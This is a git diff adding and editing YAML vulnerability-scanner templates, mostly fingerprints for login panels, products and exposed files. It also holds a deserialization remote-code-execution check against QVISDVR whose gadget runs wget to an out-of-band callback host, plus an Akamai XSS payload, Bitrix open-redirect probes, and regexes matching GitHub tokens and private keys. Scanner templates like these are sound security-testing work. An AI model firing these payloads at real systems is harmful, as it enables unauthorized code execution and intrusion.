severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22
|
||||||
|
tags: panel,login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>GXD5 Pacs Connexion utilisateur</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,20 @@
|
||||||
|
id: identity-services-engine
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Identity Services Engine
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22
|
||||||
|
tags: panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
- '{{BaseURL}}/admin/'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Identity Services Engine</title>'
|
|
@ -0,0 +1,30 @@
|
||||||
|
id: sgp-login-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: SGP Panel
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22SGP%22
|
||||||
|
tags: panel,sgp
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/accounts/login?next=/admin/'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>SGP</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- ">Ver\\. ([0-9.A-Z]+)</p>"
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: xvr-login
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: XVR LOGIN
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22
|
||||||
|
tags: panel,xvr
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/login.rsp'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>XVR LOGIN</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,7 +1,7 @@
|
||||||
id: appsec-yml-disclosure
|
id: appspec-yml-disclosure
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Appsec Yml Disclosure
|
name: Appspec Yml Disclosure
|
||||||
author: dhiyaneshDk
|
author: dhiyaneshDk
|
||||||
severity: medium
|
severity: medium
|
||||||
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json
|
reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json
|
|
@ -8,16 +8,9 @@ info:
|
||||||
tags: config,git,exposure
|
tags: config,git,exposure
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- raw:
|
- method: GET
|
||||||
- |
|
path:
|
||||||
GET /.git/config HTTP/1.1
|
- "{{BaseURL}}/.git/config"
|
||||||
Host: {{Hostname}}
|
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
|
|
||||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
|
||||||
Accept-Language: en-US,en;q=0.5
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
|
||||||
Content-Length: 1
|
|
||||||
Connection: close
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -33,4 +26,4 @@ requests:
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: github-gemfile-files
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Github Gemfiles
|
||||||
|
author: hahwul
|
||||||
|
severity: info
|
||||||
|
description: Find github page files(Gemfile / Gemfile.lock)
|
||||||
|
tags: github,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/Gemfile"
|
||||||
|
- "{{BaseURL}}/Gemfile.lock"
|
||||||
|
|
||||||
|
matchers-condition: or
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "https://rubygems.org")'
|
||||||
|
- 'contains(body, "source")'
|
||||||
|
- 'contains(body, "gem")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "https://rubygems.org")'
|
||||||
|
- 'contains(body, "remote")'
|
||||||
|
- 'contains(body, "specs")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: github-page-config
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Github pages config file
|
||||||
|
author: hahwul
|
||||||
|
severity: info
|
||||||
|
description: Find github pages config file.
|
||||||
|
tags: github,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/_config.yml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "jekyll"
|
||||||
|
- "title"
|
||||||
|
- "baseurl"
|
||||||
|
condition: and
|
File diff suppressed because it is too large
Load Diff
|
@ -0,0 +1,16 @@
|
||||||
|
id: github-personal-token
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Github Personal Token
|
||||||
|
author: geeknik
|
||||||
|
severity: high
|
||||||
|
tags: token,file
|
||||||
|
|
||||||
|
file:
|
||||||
|
- extensions:
|
||||||
|
- all
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "ghp_.{36}"
|
|
@ -2,7 +2,7 @@ id: private-key
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Private Key Detect
|
name: Private Key Detect
|
||||||
author: gaurang
|
author: gaurang,geeknik
|
||||||
severity: high
|
severity: high
|
||||||
tags: token,file
|
tags: token,file
|
||||||
|
|
||||||
|
@ -19,4 +19,6 @@ file:
|
||||||
- "\"BEGIN DSA PRIVATE KEY\""
|
- "\"BEGIN DSA PRIVATE KEY\""
|
||||||
- "\"BEGIN EC PRIVATE KEY\""
|
- "\"BEGIN EC PRIVATE KEY\""
|
||||||
- "\"BEGIN PGP PRIVATE KEY BLOCK\""
|
- "\"BEGIN PGP PRIVATE KEY BLOCK\""
|
||||||
- "\"ssh-rsa\""
|
- "\"ssh-rsa\""
|
||||||
|
- "\"ssh-dsa\""
|
||||||
|
- "\"ssh-ed25519\""
|
||||||
|
|
|
@ -0,0 +1,42 @@
|
||||||
|
id: qvisdvr-deserialization-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
author: me9187
|
||||||
|
name: QVISDVR JSF Deserialization - Remote Code Execution
|
||||||
|
severity: critical
|
||||||
|
reference: https://twitter.com/Me9187/status/1414606876575162373
|
||||||
|
tags: qvisdvr,rce,deserialization,jsf,iot
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
GET /qvisdvr/ HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /qvisdvr/index.faces;jsessionid={{token}} HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
name: token
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
part: header
|
||||||
|
regex:
|
||||||
|
- "JSESSIONID=(.*)"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: interactsh_protocol
|
||||||
|
words:
|
||||||
|
- http
|
|
@ -0,0 +1,31 @@
|
||||||
|
id: akamai-arl-xss
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Open Akamai ARL XSS
|
||||||
|
author: pdteam
|
||||||
|
severity: medium
|
||||||
|
tags: akamai,xss
|
||||||
|
reference: |
|
||||||
|
- https://github.com/war-and-code/akamai-arl-hack
|
||||||
|
- https://twitter.com/SpiderSec/status/1421176297548435459
|
||||||
|
- https://warandcode.com/post/akamai-arl-hack/
|
||||||
|
- https://github.com/cybercdh/goarl
|
||||||
|
- https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
condition: and
|
||||||
|
words:
|
||||||
|
- '"><svg onload=confirm(document.domain)>'
|
||||||
|
- 'Suggestions for improving the results'
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- 'text/html'
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: android-debug-database-exposed
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Android Debug Manager
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22
|
||||||
|
tags: unauth,android
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Android Debug Database</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: viewpoint-system-status
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: ViewPoint System Status
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: low
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22
|
||||||
|
tags: status,exposures
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>ViewPoint System Status</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: zabbix-dashboards-access
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: zabbix-dashboards-access
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
description: View dashboard with guest login.
|
||||||
|
reference: https://www.exploit-db.com/ghdb/5595
|
||||||
|
tags: zabbix,unauth
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/zabbix/zabbix.php?action=dashboard.list"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Create dashboard"
|
||||||
|
- "Zabbix SIA"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: bigbluebutton-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: BigBlueButton Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,bigbluebutton
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>BigBlueButton</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: centreon-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Centreon Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,centreon
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/centreon/index.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Centreon - IT & Network Monitoring</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: gespage-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Gespage Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,gespage
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/gespage/webapp/login.xhtml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Login utilisateur Gespage</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: getsimple-cms-detector
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: GetSimple CMS Detector
|
||||||
|
author: philippedelteil
|
||||||
|
severity: info
|
||||||
|
description: With this template we can detect a running GetSimple CMS instance
|
||||||
|
tags: getsimple,tech
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/readme.txt"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- 'GetSimple CMS is a flatfile CMS'
|
||||||
|
- type: status
|
||||||
|
part: header
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: itop-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: iTop Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,itop
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/pages/UI.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>iTop login</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: jeedom-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Jeedom Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,jeedom
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?v=d"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<title>Jeedom</title>"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: jenkins-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Jenkins detect (version)
|
||||||
|
author: philippdelteil
|
||||||
|
severity: info
|
||||||
|
tags: tech,jenkins
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "X-Jenkins"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<title>Sign in [Jenkins]</title>"
|
||||||
|
part: body
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: kval
|
||||||
|
part: header
|
||||||
|
kval:
|
||||||
|
- x_jenkins
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: openx-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OpenX detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,openx
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/www/admin/"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- '<title>OpenX</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'content="(.*)- http://www.openx.org">'
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: operations-automation-default-page
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Operations Automation Default Page
|
||||||
|
author: dhiyaneshDK
|
||||||
|
severity: info
|
||||||
|
reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22
|
||||||
|
tags: tech,default
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Operations Automation Default Page</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: phpcollab-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: PhpCollab detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,phpcollab
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/general/login.php"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '<title>PhpCollab</title>'
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- '<p id="footer">(.*)</p>'
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: wondercms-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WonderCMS Detect
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: tech,wondercms
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Powered by WonderCMS"
|
||||||
|
- "https://www.wondercms.com"
|
||||||
|
condition: and
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -1,4 +1,4 @@
|
||||||
id: jenkins-stack-traces
|
id: jenkins-stack-trace
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Detect Jenkins in Debug Mode with Stack Traces Enabled
|
name: Detect Jenkins in Debug Mode with Stack Traces Enabled
|
||||||
|
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: bitrix-open-redirect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Bitrix Open URL redirect detection
|
||||||
|
author: pikpikcu
|
||||||
|
severity: low
|
||||||
|
reference: https://packetstormsecurity.com/files/151955/1C-Bitrix-Site-Management-Russia-2.0-Open-Redirection.html
|
||||||
|
tags: redirect,bitrix
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event3=352513&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?site_id=s1&event1=select_product_t1&event2=contributions&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event1=&event2=&event3=download&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?id=28&site_id=s2&event1=banner&event2=click&event3=3+%2F+%5B28%5D+%5BBANNER_AREA_FOOTER2%5D+%D0%9F%D0%BE%D1%81%D0%B5%D1%82%D0%B8%D1%82%D0%B5+%D0%B2%D0%B2%D0%BE%D0%B4%D0%BD%D1%83%D1%8E+%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D1%83%D1%8E+%D0%BB%D0%B5%D0%BA%D1%86%D0%B8%D1%8E+APTOS&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
||||||
|
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 302
|
||||||
|
- 301
|
||||||
|
condition: or
|
|
@ -0,0 +1,29 @@
|
||||||
|
id: wordpress-upload-data
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: wordpress-upload-data
|
||||||
|
author: pussycat0x
|
||||||
|
severity: medium
|
||||||
|
description: Searches for Passwords in the wordpress uploads directory.
|
||||||
|
reference: https://www.exploit-db.com/ghdb/7040
|
||||||
|
tags: wordpress,listing
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/wp-content/uploads/data.txt"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "admin:"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue